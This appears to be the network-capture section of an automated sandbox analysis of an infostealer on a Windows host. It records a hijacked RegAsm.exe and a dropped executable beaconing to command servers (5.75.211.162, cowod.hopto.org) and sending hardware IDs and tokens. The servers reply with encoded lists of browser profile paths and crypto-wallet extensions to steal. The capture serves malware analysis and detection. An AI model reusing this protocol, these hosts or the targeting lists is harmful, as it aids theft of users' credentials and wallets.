                                                                                    Sep 27, 2024 00:15:13.434550047 CEST96INData Raw: 29 d0 83 d7 ff 21 f8 01 d0 89 c5 89 cf 52 e8 a8 f7 ff ff 5a 85 c0 74 d1 81 fd 2c 0a 04 00 76 03 89 50 f8 89 c5 89 c2 89 f0 89 f9 e8 1f f3 ff ff 89 f0 e8 08 fb ff ff 89 e8 5d 5f 5e 5b c3 90 5e 5b f6 c1 03 0f 84 25 f6 ff ff 31 c0 c3 8b c0 53 8d 58
                                                                                    Data Ascii: )!RZt,vP]_^[^[%1SX`
                                                                                    Sep 27, 2024 00:15:13.440391064 CEST1236INData Raw: 8d 14 03 09 cb 81 fb 2c 0a 04 00 73 12 f7 db d9 ee dd 14 13 83 c3 08 78 f8 89 0a dd c0 d9 f7 5b c3 8b c0 8b c8 8b d1 83 ea 04 8b 12 83 e2 f0 03 d1 8b c2 8b d0 83 ea 04 8b 12 83 e2 f0 85 d2 75 02 33 c0 c3 8d 40 00 83 3d 3c 7a 44 00 00 74 1a 8b 15
                                                                                    Data Ascii: ,sx[u3@=<zDt8zD;r;8zDs=<zDt8zD3@SV ;BuZ;ZvB+^[BH^[WA_p0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.44977845.132.206.25180396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Sep 27, 2024 00:15:14.535037994 CEST281OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: cowod.hopto.org
                                                                                    Content-Length: 5785
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Sep 27, 2024 00:15:14.535037994 CEST5785OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66
                                                                                    Data Ascii: ------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJKECAAAFHJECA
                                                                                    Sep 27, 2024 00:15:16.084714890 CEST188INHTTP/1.1 200 OK
                                                                                    Server: openresty
                                                                                    Date: Thu, 26 Sep 2024 22:15:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 0
                                                                                    Connection: keep-alive
                                                                                    X-Served-By: cowod.hopto.org
                                                                                    Sep 27, 2024 00:15:16.085499048 CEST188INHTTP/1.1 200 OK
                                                                                    Server: openresty
                                                                                    Date: Thu, 26 Sep 2024 22:15:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 0
                                                                                    Connection: keep-alive
                                                                                    X-Served-By: cowod.hopto.org
                                                                                    Sep 27, 2024 00:15:16.085565090 CEST188INHTTP/1.1 200 OK
                                                                                    Server: openresty
                                                                                    Date: Thu, 26 Sep 2024 22:15:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 0
                                                                                    Connection: keep-alive
                                                                                    X-Served-By: cowod.hopto.org


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449783104.26.13.205803396C:\ProgramData\AFHDGDGIID.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Sep 27, 2024 00:15:30.650614977 CEST63OUTGET / HTTP/1.1
                                                                                    Host: api.ipify.org
                                                                                    Connection: Keep-Alive
                                                                                    Sep 27, 2024 00:15:31.230916023 CEST227INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:31 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 11
                                                                                    Connection: keep-alive
                                                                                    Vary: Origin
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969cf3dc361977-EWR
                                                                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                    Data Ascii: 8.46.123.33
                                                                                    Sep 27, 2024 00:15:34.891604900 CEST39OUTGET / HTTP/1.1
                                                                                    Host: api.ipify.org
                                                                                    Sep 27, 2024 00:15:35.001194000 CEST227INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:34 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 11
                                                                                    Connection: keep-alive
                                                                                    Vary: Origin
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969d0b6e631977-EWR
                                                                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                    Data Ascii: 8.46.123.33


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449739104.102.49.254443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:27 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                    Host: steamcommunity.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:27 UTC1870INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Date: Thu, 26 Sep 2024 22:14:27 GMT
                                                                                    Content-Length: 34725
                                                                                    Connection: close
                                                                                    Set-Cookie: sessionid=01205d584caffe8e351fe9fc; Path=/; Secure; SameSite=None
                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                    2024-09-26 22:14:27 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                    2024-09-26 22:14:27 UTC16384INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                    Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                    2024-09-26 22:14:27 UTC3768INData Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f
                                                                                    Data Ascii: vate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
                                                                                    2024-09-26 22:14:27 UTC59INData Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: </div>... responsive_page_frame --></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.4497405.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:28 UTC185OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:29 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.4497415.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:30 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 256
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:30 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 42 32 39 41 38 33 39 37 35 30 33 30 31 32 33 34 33 35 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d
                                                                                    Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="hwid"28B29A8397503012343576-a33c7340-61ca------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KKFCFBKFCFBFIDGCGDHJ--
                                                                                    2024-09-26 22:14:30 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:30 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 3a1|1|1|1|0fdd4ff8b8b9f6fde4d09adeb4e6b99c|1|1|1|0|0|50000|10


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.4497425.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:31 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJJEHJJKJEGHJJKEBFBGCont
                                                                                    2024-09-26 22:14:32 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:32 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.4497435.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:32 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DGHJEHJJDAAAKEBGCFCACont
                                                                                    2024-09-26 22:14:33 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:33 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                    Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.4497445.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:34 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAA
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 332
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:34 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------ECFCBKJDBFIJKFHIIDAACont
                                                                                    2024-09-26 22:14:34 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:34 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.4497455.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:35 UTC278OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 7181
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:35 UTC7181OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74
